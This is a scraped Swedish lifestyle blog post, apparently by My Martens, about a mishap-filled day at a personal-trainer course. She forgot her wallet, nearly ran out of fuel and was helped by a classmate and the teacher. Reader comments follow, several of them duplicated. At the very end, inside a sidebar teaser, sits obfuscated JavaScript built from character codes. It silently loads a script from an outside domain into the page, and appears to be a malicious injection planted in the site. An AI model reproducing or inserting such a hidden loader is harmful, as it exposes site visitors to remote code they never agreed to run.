Imorse lämnade jag hjärnan hemma. Klantskalle DELUXE!!!! tack alla inblandade!

Hej fina! vart tar dagarna vägen? Tiden bara rinner iväg. Nu är klockan strax innan midnatt igen. Hmm. Jag har precis slagit igen mina teoribäckar. Just nu känner jag mig mest förvirrad. Men jag ska sova på alla nya termer, utryck och all den information som jag fått bara under dagen. Det är verkligen imponerande hur mycket man faktiskt klarar av att ta in på så kort tid. SAFEs utbildning är verkligen grundligt genomtänkt…

Vad kul att många av er är så glada för min och Ludvigs skull över våran nya familjemedlem Sture <3  Vi längtar efter honom! 

Söndag kväll… jag är trött, tröttare, tröttast! Först och främsta en bilbomb ifrån dagens studier.Jag veeeeeet att bildkvalitet och ljuset är skumt, Jag vet inte varför det blir så i dessa lokaler. Det är någonting med ljuset som jag inte kommer på hur jag ska hantera det. Nåväl, du får stå ut med dessa bilder i skal-inläggen 😉

Jag var i skolan strax innan 08:00. Min morgon började katastrofalt !!! Då menar jag verkligen riktigt illa! Jag är nog Sveriges största klantskalle! Mer om det längre ner…

HELA klassen stod utanför grinden som normalt sett var öppen och funderade på när någon skulle komma och öppna. Hmm, klockan tickade på. Konstigt. Då någon säger: -är det någon som provat att slå koden?

hahaha! Nej, det  var det inte. och vips så var vi alla inne. Det jag INTE nämnde just då var att det var jag som kom först… hehe! Nåväl. En fullspäckad dag med Kroppsanalys och biomekanik på schemat. Idag var Liselott här, SAFEs VD. Jätte kul att få träffa henne också =) Jag gjorde kanske inte mitt bästa första intryck. (se längre ner) 140816-MyMartens-P8141062-150517 140816-MyMartens-P8141065-150713 140816-MyMartens-P8141070-151842 140816-MyMartens-P8141036-143943Alltså kolla in Rasmus hoppande armhävning! SÅ spänstig och rörlig kille! Jag är GRYMT imponerad! 

140816-MyMartens-P8141061-150214 140816-MyMartens-P8141060-150206 140816-MyMartens-P8141040-144258

Självklart fick jag som är vig som ett kylskåp, som inte har någon erfarenhet av Yoga, illustrera ”krigaren” Hahaha! Jaja, jag bjöd på ett gott skratt iallafall 😉

image

Nåväl, dags för lunch…. Kyckling och kinoa. inte så gastronomisk upplevelse direkt, men enkelt, billigt och nyttigt. 

IMG_9147Men innan vi satte oss för att äta lunchen så fick vi slänga oss iväg i en taxi. Varför då kan man undra.

IMG_9138

Jo, för att jag imorse lämnade Sigtuna, matlådor, skolböcker, dator, och träningskläder var packade. Tidsmässigt låg jag bra till och söndagstrafiken var till min fördel. Jag kör in vid en mack, närmare stan. Vad händer där?! JO, jag inser att jag har glömt plånboken hemma. SUCK! okay, ingen panik… jag kanske kan swicha han som står i kassan eller nått. MEN, det gick minsann inte. för att min swich var inaktiv! SUCK igen! Sedan konkursen har jag nya kort. Plus att min mobil gått sönder där emellan. Så med andra ord var jag alltså helt strandad. Okay, ingen panik tänkte jag. jag började mäta avståndet pock tiden om jag skulle hinna tillbaka till Sigtuna, för att hämta plånboken. Men då skulle bensinen inte räcka till. Bensinen skulle precis räcka till skolan, och jag skulle då vara säker på att vara framme i tid. Sagt och gjort. Jag gasar in mot stan. Vad gör jag då. Jo, jag tar såklart FEL avfart och åker på en rejäl omväg! satans he*vetes, j*vla sk*t!!!!

 Hmm, jag ser att det är gränsfall att det ska räcka heja vägen fram. Alltså min inre stress just då. OM jag skulle fått bensin stopp så hade jag alltså inte kunnat ta en taxi osv. SUCK!  Det är dessutom 100% närvaro i skolan som gäller, annars blir man inte godkänd.

MEN jag klarar mig hela vägen fram. När jag parkerar bilen så står det räckvidd 1.2km. Alltså 1200m. Närmaste bensinstation ligger 3.6km därifrån. Man behöver inte vara en Einstein för att räka ut att det inte skulle gå att ta sig till en bensinration. Jag lyfter frågan med mina klasskamrater, jag berättar att jag imorse lämnade hjärnan hemma istället för att ta med den till skolan. Ingen har bil eller kontanter. Men strax efter så presenterar jag mig för våran nya lärare Liselott, som då lånar ut mig ett par hundra ( TACK! ) Men så pinsamt!

Vid lunch erbjuder sig min klasskamrat Armin att följa med mig till en bensinstation, så vi ringer en taxi, åker till macken. Köper en dunk. tankar upp dunken. tar samma taxi tillbaka förr att fylla på med några liter. Vi han precis i tid så att vi skulle hinna äta i lugn och ro. TUSEN tack Armin!

Men det stannar inte där. För jag kan nu ta mig till macken, men har fortfarande inte tillräckligt mycket pengar för att ta mig hem. (SUCK IGEN) PLUS att jag har en tid att passa efter skolan…. Armin erbjuder sig igen, så direkt efter skolan åker han med mig till en bensinstation där vi tankar upp bilen med hans kort. Samtidigt har jag kopplat in min väninna Annelie som befinner sig på Gotland och därifrån får svischa Armin pengar. Tack, tack tack! <3IMG_9140

Osminkad, stressad, genomsvettig av stressen passar jag givetvis på att ta en taxi-selfie såklart 😉

VI hade  iallfall med bensinen i knät redo att tanka upp Pärlan! hahaha! ja, det var ju minst sagt ett annorlunda sätt att spendera si lunch på. Armin, jag säger ju att det alltid händer saker runtomkring mig 😉

 Förutom detta kaoset så har jag hällt ut en kaffe över min första outfit jag hade på mig, gått rakt in i en glasdörr framför Armin, tappat ut HELA min påse med nötter framför Pontus m.m. En sånär dag man kanske rent av borde stannat kvar i sängen!!!!!

IMG_9144

140816-MyMartens-P8141024-120518Räddaren i nöden offrade sin lunch och sin lunchträning för att hjälpa mig reda ut mitt självförvållade kaos! Vilken hjälte! Imorgon ska jag aktivera mitt bank id och min swich på rasten! Då har banken öppet och det bord gå ganska snabbt. Sen har jag satt upp en lapp på dörren ”mobil, nycklar, plånbok, hjärnan” hahaha! NU ska jag sova. för snart ringer klockan igen…… Kramar

/ My Martens

72 Komentarer

  • Banken behöver inte vara öppen, du behöver en dosa + dator för att fixa nytt BankID. Sedan är Swish bara att hämta hem och lägga in mobilnr om du har samma nr.

 1. Låter onekligen som en ytterst stressig början på dagen! Härligt med folk som är hjälpsamma. Men brukar inte bilen kunna gå en bit längre än mätaren säger?

  • Banken behöver inte vara öppen, du behöver en dosa + dator för att fixa nytt BankID. Sedan är Swish bara att hämta hem och lägga in mobilnr om du har samma nr.

   • redis Lee, och om man inte har någon dosa. Och det är söndag, banken är stäng och ingen mob tjänst att nyttja då går inte det ändå! 😉

 2. Usch låter som en aningen stressig söndag! Hemskt, har själv gjort något liknande. Skönt med medmänniskor som hjälper!
  Ha en bra dag och va rädd om dig!
  Kram

 3. Låter onekligen som en ytterst stressig början på dagen! Härligt med folk som är hjälpsamma. Men brukar inte bilen kunna gå en bit längre än mätaren säger?

 4. Usch låter som en aningen stressig söndag! Hemskt, har själv gjort något liknande. Skönt med medmänniskor som hjälper!
  Ha en bra dag och va rädd om dig!
  Kram

  • Men kära Linn vilken negativitet så här mitt i allt! Gå ut i livet och gör dig själv eller någon annan glad, umgås med en vän, tänk positivt och gör nåt för dig själv! För egentligen mår du nog inte bra innerst inne att spy elakheter som ger en kort tillfredsställelse och mysigt pirr av makt i magen. Det är så kortvarigt och det kommer sist och slutligen inte att påverka den du är elak emot, däremot stannar det negativa kvar inom dig. Välj det som är bra för dig istället!
   Vilken gentleman din klasskompis är My, verkar vara en fin vän! ?

  • Meeeeeeen. Att du bara måste. Om hon skulle utnyttja dem så skulle hon väl inte skriva vad hon gjort här. Fint att det finns människor som hjälper och inte bara stjälper .

 5. Du är fin utan smink också det är inget du behöver grubbla över att du är osminkad ibland när du tar bilder det är okej att varan utan smink.

  • Men kära Linn vilken negativitet så här mitt i allt! Gå ut i livet och gör dig själv eller någon annan glad, umgås med en vän, tänk positivt och gör nåt för dig själv! För egentligen mår du nog inte bra innerst inne att spy elakheter som ger en kort tillfredsställelse och mysigt pirr av makt i magen. Det är så kortvarigt och det kommer sist och slutligen inte att påverka den du är elak emot, däremot stannar det negativa kvar inom dig. Välj det som är bra för dig istället!
   Vilken gentleman din klasskompis är My, verkar vara en fin vän! 🙂

  • Meeeeeeen. Att du bara måste. Om hon skulle utnyttja dem så skulle hon väl inte skriva vad hon gjort här. Fint att det finns människor som hjälper och inte bara stjälper .

  • Ja verkligen. Jag är dessutom expert på att påminna mina vänner om det….. Men jag själv glömde plånkan hemma, ett par mil hemifrån, ett par mil från stan. Då blev det såhär =) Katastrofalt dålig planering! Håller med! -Helt värdelöst ?

 6. Hej du borde läsa fröken duktig’ s blogg. Det är lätt att blunda från symtom från utmattningssyndrom…Försök ta hand om dig, känns sorgligt att du klankar ner på dig själv som en strulputte, då din hjärna troligtvis bara säger nu är det nog, när ska du försöka ta det lugnt. Varm kram och försök vila å återhämta dig!

 7. Du är fin utan smink också det är inget du behöver grubbla över att du är osminkad ibland när du tar bilder det är okej att varan utan smink.

  • Ja verkligen. Jag är dessutom expert på att påminna mina vänner om det….. Men jag själv glömde plånkan hemma, ett par mil hemifrån, ett par mil från stan. Då blev det såhär =) Katastrofalt dålig planering! Håller med! -Helt värdelöst 😉

 8. Hej du borde läsa fröken duktig’ s blogg. Det är lätt att blunda från symtom från utmattningssyndrom…Försök ta hand om dig, känns sorgligt att du klankar ner på dig själv som en strulputte, då din hjärna troligtvis bara säger nu är det nog, när ska du försöka ta det lugnt. Varm kram och försök vila å återhämta dig!

  • Varför inte? Min blogg, min vardag, just nu i skolan? Vad är det du bekymrar/oroar dig för? Lite trist att läsa en blogg utan bilder? Fast guuuud vad tid jag skulle spara ? hehe

  • Varför inte? Min blogg, min vardag, just nu i skolan? Vad är det du bekymrar/oroar dig för? Lite trist att läsa en blogg utan bilder? Fast guuuud vad tid jag skulle spara 😉 hehe

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/